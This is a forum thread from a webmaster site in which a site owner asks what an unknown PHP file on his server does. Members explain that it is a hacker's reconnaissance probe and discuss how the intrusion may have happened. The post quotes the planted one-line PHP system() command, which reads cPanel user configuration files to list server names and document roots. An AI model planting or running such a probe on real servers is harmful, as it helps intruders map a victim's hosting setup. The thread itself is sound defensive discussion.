homepage Welcome to WebmasterWorld Guest from 54.166.113.249
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / WebmasterWorld / Webmaster General
Forum Library, Charter, Moderators: phranque

Webmaster General Forum

    
Mysterious file on my server
virtualreality

5+ Year Member



 
Msg#: 4646963 posted 7:51 am on Feb 20, 2014 (gmt 0)

Hello, yesterday a mysterious file appeared on my server - sadfsdfsdf.php. The host says they dont know anything about how it happened but I dont trust them because their customer service is really bad. The content of the file is:


<?PHP echo system('FILES=/var/cpanel/userdata/myusernamehere/*;for i in $FILES;do egrep "servername|documentroot" $i | awk \'{print $1,$2}\' | egrep "^servername|^documentroot";echo ;done'); ?>

Can anyone translate what this code means? Many thanks!

 

phranque

WebmasterWorld Administrator phranque us a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



 
Msg#: 4646963 posted 10:52 am on Feb 20, 2014 (gmt 0)

this script could be used to expose information about your web server configuration.

essentially it means - print out the first two fields of every row that contains "servername" or "documentroot" in any file in the /var/cpanel/userdata/myusernamehere/ directory.

virtualreality

5+ Year Member



 
Msg#: 4646963 posted 11:16 am on Feb 20, 2014 (gmt 0)

Thanks. Is that something the server people put and do not want to say they did? or could it be a hack, if so what benefit a hacker can have from this info?

lucy24

WebmasterWorld Senior Member lucy24 us a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



 
Msg#: 4646963 posted 10:45 pm on Feb 20, 2014 (gmt 0)

I can't imagine the server administrators asking for information that they already have. Unless they're testing code-- and they wouldn't do that on some random customer's site!

For the hacker it's a preliminary inquiry. The information itself may or may not be useful; what they really want to know is whether they're able to get the information in the first place.

Hacking comes in many forms. What you've got here is a two-step approach. First comes the data collection, like your file, or checking whether they're able to "PUT" a file. If the first test comes up positive, they'll be back for bigger and nastier ventures.

I assume you removed the file the instant you found it. Did it come back?

phranque

WebmasterWorld Administrator phranque us a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



 
Msg#: 4646963 posted 12:20 am on Feb 21, 2014 (gmt 0)

Not only that it tells the hacker you have a cpanel installation which would allow them to take advantage of a potential cpanel vulnerability.

virtualreality

5+ Year Member



 
Msg#: 4646963 posted 12:48 pm on Feb 21, 2014 (gmt 0)

Yes I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

lucy24

WebmasterWorld Senior Member lucy24 us a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



 
Msg#: 4646963 posted 1:31 pm on Feb 21, 2014 (gmt 0)

The host says they dont know anything about how it happened but I dont trust them

:: twiddling thumbs ::

virtualreality

5+ Year Member



 
Msg#: 4646963 posted 1:55 pm on Feb 21, 2014 (gmt 0)

Their exact reply was:

It is important to remember that when it comes to the security of your site, it is your responsibility to make sure that none of the files you upload can be hacked. The server is secure, and I assure that is not how any hacker got in, if that is what happened. If they did get it, it was through your files that you uploaded. It is highly recommended that you determine if this file is intended or not, and then make sure that you always secure your files, to insure that hackers are not able to break in through the files and upload malware. Thank you.

lucy24

WebmasterWorld Senior Member lucy24 us a WebmasterWorld Top Contributor of All Time Top Contributors Of The Month



 
Msg#: 4646963 posted 9:27 pm on Feb 21, 2014 (gmt 0)

They think it's your fault your site got hacked? Well, maybe if your FTP password is "password" and your username* is "user" ...


* Notice how in movies-- the ones where they get the password within three guesses-- they never, ever have to figure out the username first?

Samizdata

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 4646963 posted 10:19 pm on Feb 21, 2014 (gmt 0)

I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

Consider how they got your username and password in the first place.

One obvious possibility is a trojan on your computer.

...

Jonesy

5+ Year Member



 
Msg#: 4646963 posted 10:22 pm on Feb 23, 2014 (gmt 0)

Consider how they got your username and password in the first place.
One obvious possibility is a trojan on your computer.

Another possibility is using the same username and password
in many other sites, and one of them got cracked badly.
Jonesy

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / WebmasterWorld / Webmaster General
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved